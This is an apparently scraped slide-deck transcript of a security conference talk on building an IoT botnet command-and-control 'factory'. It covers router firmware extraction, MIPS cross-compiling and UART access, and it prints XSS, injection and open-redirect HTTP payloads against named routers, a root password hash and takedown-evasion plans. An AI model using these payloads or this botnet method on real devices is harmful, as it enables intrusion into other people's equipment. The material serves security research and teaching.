Network Adapter Deep dive
 
BPF: Tracing and more
BPF: Tracing and moreBPF: Tracing and more
BPF: Tracing and more
 
Debugging 2013- Jesper Brouer
Debugging 2013- Jesper BrouerDebugging 2013- Jesper Brouer
Debugging 2013- Jesper Brouer
 
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
 

Mehr von Nullbyte Security Conference

Windows Internals: fuzzing, hijacking and weaponizing kernel objects
Windows Internals: fuzzing, hijacking and weaponizing kernel objectsWindows Internals: fuzzing, hijacking and weaponizing kernel objects
Windows Internals: fuzzing, hijacking and weaponizing kernel objectsNullbyte Security Conference
 
Anti-Anti-Forense de Memória: Abortando o "Abort Factor"
Anti-Anti-Forense de Memória: Abortando o "Abort Factor"Anti-Anti-Forense de Memória: Abortando o "Abort Factor"
Anti-Anti-Forense de Memória: Abortando o "Abort Factor"Nullbyte Security Conference
 
Rootkits em kernel space - Redshift, um rootkit para o kernel do FreeBSD
Rootkits em kernel space - Redshift, um rootkit para o kernel do FreeBSDRootkits em kernel space - Redshift, um rootkit para o kernel do FreeBSD
Rootkits em kernel space - Redshift, um rootkit para o kernel do FreeBSDNullbyte Security Conference
 
How i cracked millions of “pt br” hashed passwords
How i cracked millions of “pt br” hashed passwordsHow i cracked millions of “pt br” hashed passwords
How i cracked millions of “pt br” hashed passwordsNullbyte Security Conference
 
Evitando execução de códigos arbitrários com GRsecurity e PaX
Evitando execução de códigos arbitrários com GRsecurity e PaXEvitando execução de códigos arbitrários com GRsecurity e PaX
Evitando execução de códigos arbitrários com GRsecurity e PaXNullbyte Security Conference
 

Mehr von Nullbyte Security Conference (13)

Speeding up Red Team engagements with carnivorall
Speeding up Red Team engagements with carnivorallSpeeding up Red Team engagements with carnivorall
Speeding up Red Team engagements with carnivorall
 
Gitminer 2.0 - Advance Search on Github
Gitminer 2.0 - Advance Search on GithubGitminer 2.0 - Advance Search on Github
Gitminer 2.0 - Advance Search on Github
 
Automatizando o abuso de repositórios expostos
Automatizando o abuso de repositórios expostosAutomatizando o abuso de repositórios expostos
Automatizando o abuso de repositórios expostos
 
Windows Internals: fuzzing, hijacking and weaponizing kernel objects
Windows Internals: fuzzing, hijacking and weaponizing kernel objectsWindows Internals: fuzzing, hijacking and weaponizing kernel objects
Windows Internals: fuzzing, hijacking and weaponizing kernel objects
 
Is rust language really safe?
Is rust language really safe? Is rust language really safe?
Is rust language really safe?
 
Stealth post-exploitation with phpsploit
Stealth post-exploitation with phpsploitStealth post-exploitation with phpsploit
Stealth post-exploitation with phpsploit
 
Anti-Anti-Forense de Memória: Abortando o "Abort Factor"
Anti-Anti-Forense de Memória: Abortando o "Abort Factor"Anti-Anti-Forense de Memória: Abortando o "Abort Factor"
Anti-Anti-Forense de Memória: Abortando o "Abort Factor"
 
Muito além do alert() em ataques web client side
Muito além do alert() em ataques web client sideMuito além do alert() em ataques web client side
Muito além do alert() em ataques web client side
 
Cabra Arretado Aperriando o WordPress
Cabra Arretado Aperriando o WordPressCabra Arretado Aperriando o WordPress
Cabra Arretado Aperriando o WordPress
 
Rootkits em kernel space - Redshift, um rootkit para o kernel do FreeBSD
Rootkits em kernel space - Redshift, um rootkit para o kernel do FreeBSDRootkits em kernel space - Redshift, um rootkit para o kernel do FreeBSD
Rootkits em kernel space - Redshift, um rootkit para o kernel do FreeBSD
 
How i cracked millions of “pt br” hashed passwords
How i cracked millions of “pt br” hashed passwordsHow i cracked millions of “pt br” hashed passwords
How i cracked millions of “pt br” hashed passwords
 
Evitando execução de códigos arbitrários com GRsecurity e PaX
Evitando execução de códigos arbitrários com GRsecurity e PaXEvitando execução de códigos arbitrários com GRsecurity e PaX
Evitando execução de códigos arbitrários com GRsecurity e PaX
 
All your binaries are belong to us
All your binaries are belong to usAll your binaries are belong to us
All your binaries are belong to us
 

Kürzlich hochgeladen

My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 

Kürzlich hochgeladen (20)

DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 

C&C Botnet Factory

  • 1. NullByte-C0n C&C B0tn3t F4ct0ry by: Torontux 10111 00101 00101 01001 01010 10101 00101 01010 10101 00101 01010 10111 00101 00101 01001 01010 10101 00101 01010 10101 00101 01010
  • 2. # whoami * Toronto Garcez aka Torontux * Pentester * IoT cell leader * BWCon www.bwcon.com.br
  • 3. # cat agenda.txt * Motivation * Firmwares - how to get? - binwalk + firmware-mod-kit - Cross Compiling, Malta, Busybox * Bugs + bugs + bugs ... * C&C (cec.rb + bn.rb) * Demo * Next steps
  • 4. # wget http://pastebin.com/raw/0SNSvyjJ _ _ _ ____ _ _ | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |_| |/ _` |/ __| |/ / | _ / _` |/ __| |/ / | | _ | (_| | (__| < | |_) | (_| | (__| <|_| |_| |_|__,_|___|_|_ |____/ __,_|___|_|_(_) A DIY Guide ,-._,-._ _,- o O_/; / , ` `| | -.,___, / ` `-.__/ / ,. / `-.__.-` ./ ' / /| ___ ,/ ` ( ( |.-"` '/ ` / ,, | _ | o/o / . , / / ( __`;-;'__`) `//'` `||` ` _// || __ _ _ _____ __ .-"-._,(__) .(__).-""-. | | | | |_ _| | / / | | |_| | | | | / / | | _ | | | | `'-------` `--------'` __| |_| |_| |_| |__ #antisec
  • 5. # cat hacklog.txt “So, I had three options: look for a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the embedded devices. A 0day in an embedded device seemed like the easiest option, and after two weeks of work reverse engineering, I got a remote root exploit.” “ I did a lot of work and testing before using the exploit against Hacking Team. I wrote a backdoored firmware, and compiled various post-exploitation tools for the embedded device.”
  • 6. # man firmwares * Download Firmware updates * Extract from serial(UART) * Looking for filesystem
  • 7. # man firmwares * binwalk + hexdump + firmware-mod-kit * Look for big chunks of 00s or FFs delimiting the parts * Check for common compression stream patterns -> zlib: 78 01, 78 9C, 78 DA -> gzip: 1F 8B -> LZMA: 5D 00 00 80 * Offset to extract de filesystem * squashfs
  • 8. # hexdump -c wr740nv6.bin |more 00000000 01 00 00 00 54 50 2d 4c 49 4e 4b 20 54 65 63 68 |....TP-LINK Tech | 00000010 6e 6f 6c 6f 67 69 65 73 00 00 00 00 76 65 72 2e |nologies....ver.| 00000020 20 31 2e 30 00 00 00 00 00 00 00 00 00 00 00 00 | 1.0............| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000040 07 40 00 06 00 00 00 01 00 00 00 00 df 34 0f 03 |.@...........4..| 00000050 18 76 7d 82 2f 96 05 35 43 b2 be 7b 00 00 00 00 |.v}./..5C..{....| 00000060 d6 3b e9 70 2e 5b ca 44 4a e9 a7 33 e1 d9 9b ee |.;.p.[.DJ..3....| 00000070 00 00 00 00 80 00 20 00 80 1c cf b0 00 3e 02 00 |...... ......>..| ... 00120200 68 73 71 73 53 02 00 00 74 d1 1c 56 00 00 02 00 |hsqsS...t..V....| 00120210 29 00 00 00 02 00 11 00 e0 00 01 00 04 00 00 00 |)...............| 00120220 0b 0b 5b 0e 00 00 00 00 2b e6 2a 00 00 00 00 00 |..[.....+.*.....| 00120230 23 e6 2a 00 00 00 00 00 ff ff ff ff ff ff ff ff |#.*.............| ...
  • 9. # binwalk wr740nv6_br.bin DECIMAL HEX DESCRIPTION --------------------------------------------------------------------- 0 0x0 TP-Link firmware header, firmware version: 0.- 15447.3, ... 13424 0x3470 U-Boot version string, U-Boot 1.1.4 13472 0x34A0 CRC32 polynomial table, big endian 14784 0x39C0 uImage header, OS: Linux, CPU: MIPS, compression type: lzma, image name: "u-boot image" 14848 0x3A00 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 93336 bytes 131584 0x20200 TP-Link firmware header, firmware version: 0.0.3 132096 0x20400 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 2495224 bytes 1180160 0x120200 Squashfs filesystem, little endian, version 4.0... # dd if=wr740nv6_br.bin skip=1 bs=1180160 of=filesystem.squashfs 2+1 registros de entrada 2+1 registros de saída 2883584 bytes (2,9 MB) copiados, 0,0106605 s, 270 MB/s # file filesystem.squashfs filesystem.squashfs: Squashfs filesystem, little endian, version 4.0,
  • 10. # binwalk -e wr740nv6_br.bin DECIMAL HEX DESCRIPTION -------------------------------------------------------------------------- 0 0x0 TP-Link firmware header, firmware version: 0.-15447.3, ... ... 1180160 0x120200 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2811435 bytes, 595 inodes, blocksize: 131072 bytes, created: 2015-10-13 09:40:04 total 52K 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 bin 4,0K drwxr-xr-x 3 root root 4,0K Set 21 2015 dev 4,0K drwxr-xr-x 7 root root 4,0K Set 21 2015 etc 4,0K drwxr-xr-x 5 root root 4,0K Set 21 2015 lib 0 lrwxrwxrwx 1 root root 11 Nov 15 13:57 linuxrc -> bin/busybox 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 mnt 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 proc 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 root 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 sbin 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 sys 4,0K drwxrwxrwt 2 root root 4,0K Set 21 2015 tmp 4,0K drwxr-xr-x 4 root root 4,0K Set 21 2015 usr 4,0K drwxr-xr-x 3 root root 4,0K Set 21 2015 var 4,0K drwxr-xr-x 10 root root 4,0K Out 13 2015 web # ls -lhs _wr740nv6_br.bin.extracted/squashfs-root/
  • 11. # binwalk wr720nv2-en-up.bin DECIMAL HEXADECIMAL DESCRIPTION ------------------------------------------------------------------ 20 0x14 IMG0 (VxWorks) header, size: 1559872 26740 0x6874 VxWorks operating system version "5.5.1" , compiled: "Jun 18 2013, 12:19:11" 26836 0x68D4 LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 636256 bytes 262292 0x40094 IMG0 (VxWorks) header, size: 1297600 262420 0x40114 LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 3657936 bytes 1256228 0x132B24 Wind River management filesystem, compressed, 194 files 1265584 0x134FB0 LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 14696 bytes 1268652 0x135BAC LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 629 bytes 1268992 0x135D00 LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 2731 bytes
  • 12. # man firmware-mod-kit ./extract-firmware.sh wr740nv6_br.bin fmk/rootfs/ fmk/new-filesystem.squashfs fmk/logs/config.log fmk/logs/binwalk.log fmk/image_parts/header.img fmk/image_parts/rootfs.img ./build-firmware.sh fmk/new-firmware.bin
  • 13. # man cross compiling |grep mips * gcc-mips-linux-gnu * -static option (Will increase size) * strip * Tks Rafael Machado ;) root@debian-mips:~# ls -lhsa 4,0K drwx------ 5 root root 4,0K Nov 25 18:18 . 4,0K drwxr-xr-x 21 root root 4,0K Dez 8 2013 .. 664K -rwxr-xr-x 1 root root 657K Nov 25 18:18 teste root@debian-mips:~# strip teste 4,0K drwx------ 5 root root 4,0K Nov 25 18:18 . 4,0K drwxr-xr-x 21 root root 4,0K Dez 8 2013 .. 608K -rwxr-xr-x 1 root root 604K Nov 25 18:19 teste
  • 14. # man qemu |grep mips * https://www.linux-mips.org/wiki/MIPS_Malta * Debian Squeeze and Wheezy mips images for QEMU: https://people.debian.org/~aurel32/qemu/mips/ qemu-system-mips -M malta -m 256 -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -vnc 172.16.68.128:0 -net nic -net user,hostfwd=tcp::2222-:22 root@172.16.68.128's password: Linux debian-mips 2.6.32-5-4kc-malta #1 Tue Sep 24 00:02:22 UTC 2013 mips Last login: Fri Nov 25 17:19:33 2016 root@debian-mips:~# root@debian-mips:~# uname -a Linux debian-mips 2.6.32-5-4kc-malta #1 Tue Sep 24 00:02:22 UTC 2013 mips GNU/Linux
  • 15. # cd busybox && make menuconfig
  • 16. # man UART TP-Link TL-WR841ND - 2 detachable antennas - 4 Port 100/10 Switch - 1 Port 100/10 Wan Interface - 4 MB Flash - 32 MB Ram - WPS Button - Wi-Fi On/Off Button * Tks Osvaldo! ;)
  • 17. # man UART * Find RX/TX/GND/VCC * VCC 3v3 * GND 0,0 * TX about 3v * Velocity 115200 cat /etc/shadow root:$1$GTN.gpri$DlSyKvZKMR9A9Uj9e9wR3/:15502:0:99999:7:::
  • 18. # cat bugs.txt * looking for bugs: - Web applications (XSS,CSRF,LFI,RCE,etc...) - Memory Corruptions - Hardcoded passwords and Default credentials - Backdoors - Information disclosures
  • 19. # cat totolink_payload.txt POST /login.cgi HTTP/1.1 Host: 192.168.1.1 Referer: http://192.168.1.1/login.htm Cookie: SessionID= username=admin&password=%22%3E%3Cscript%3Ealert%28%22NullByte %22%29%3B%3C%2Fscript%3E&submit.htm%3Flogin.htm=Send
  • 20. # cat linkOne_payloads.txt GET /goform/SafeWanWebMan? GO=system_remote.asp&RMEN=1&port=8080&IP=0.0.0.0" %3balert(1)%2f%2f HTTP/1.1 Host: 192.168.0.1 Cookie: language=en; admin:language=en Connection: keep-alive POST /goform/SysStatusHandle HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 Referer: http://192.168.0.1/system_status.asp Cookie: language=en; admin:language=en CMD=WAN_CON&GO=system_status.asp&action=;alert(1) ;
  • 21. # cat linkOne_payloads2.txt Open Redirect -------------- GET /goform/SysStatusHandle? CMD=&GO=http://www.evil.com.br&action= HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q =0.9,*/*;q=0.8 Cookie: language=en; admin:language=en Connection: close
  • 22. # man cec * Command and Control * Ruby * Client and Server (cec.rb and bn.rb) * HTTP * No frameworks(cgi)
  • 23. # man cec - C&C C&C client bot.sh comands 5s 5s 5s
  • 25. # cat next_steps.txt * Fix bugs * Code refactor * More features * Criptography * Clients to ARM / MIPS / etc... * TakeDown Evasion
  • 26. # man tor2web * https://www.tor2web.org/ “Tor is a software project that lets you anonymously browse the Internet. Tor2web is a project to let Internet users access Tor Onion Services without using Tor Browser” * replace .onion with .onion.to or .onion.city or .onion.cab or .onion.direct Anonymity for the server • eqt5g4fuenphqinx.onion • End-to-end encryption